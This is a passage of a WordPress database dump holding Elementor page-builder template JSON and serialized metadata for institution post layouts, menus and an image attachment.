settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(38607,335,'_elementor_css','a:6:{s:4:\"time\";i:1770885021;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(27733,4029,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27734,4029,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27736,4030,'_elementor_edit_mode','builder'),(27737,4030,'_elementor_template_type','single-post'),(27738,4030,'_elementor_version','3.4.0'),(27739,4030,'_elementor_pro_version','3.3.6'),(27740,4030,'_wp_page_template','default'),(27741,4030,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27743,4030,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27744,4030,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27746,4031,'_elementor_edit_mode','builder'),(27747,4031,'_elementor_template_type','single-post'),(27748,4031,'_elementor_version','3.4.0'),(27749,4031,'_elementor_pro_version','3.3.6'),(27750,4031,'_wp_page_template','default'),(27751,4031,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd87be8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4eccdfc\"}],\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e3d1e6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ec0a7c8\",\"elType\":\"widget\",\"settings\":{\"show_post_title\":\"yes\",\"excerpt_trimmed_ending\":\"...\",\"prev_text\":\"Older posts\",\"next_text\":\"Newer posts\",\"items_color\":\"#000000\",\"next_icon\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-posts-navigation\"}],\"isInner\":false}],\"isInner\":false}]'),(27753,4031,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(27754,4031,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(27757,4032,'_wp_attached_file','2020/07/Untitled3.png'),(27758,4032,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:21:\"2020/07/Untitled3.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled3-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Untitled3-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"Untitled3-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"Untitled3-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"Untitled3-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27771,4034,'_elementor_edit_mode','builder'),(27772,4034,'_elementor_template_type','single-post'),(27773,4034,'_elementor_version','3.4.0'),(27774,4034,'_elementor_pro_version','3.3.6'),(27775,4034,'_wp_page_template','default'),(27776,4034,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}],\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ddd1f6b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f252917\"}]},\"elements\":[{\"id\":\"ed69517\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269000000000005456968210637569427490234375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"bcc8fe1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"9e89f61\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Date modified:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"3d1d791\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"e0ed79b\\\" name=\\\"shortcode\\\" settings=\\\"%7B%22shortcode%22%3A%22%5Bpost-views%5D%22%7D\\\"]\"}},{\"type\":\"comments\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"803e164\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"text_color\":\"#02010154\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.675999999999998379962562466971576213836669921875,\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Useful Links\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8da2f7a\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_links\",\"align_items\":\"left\",\"pointer\":\"none\",\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"},{\"id\":\"8b8840b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing 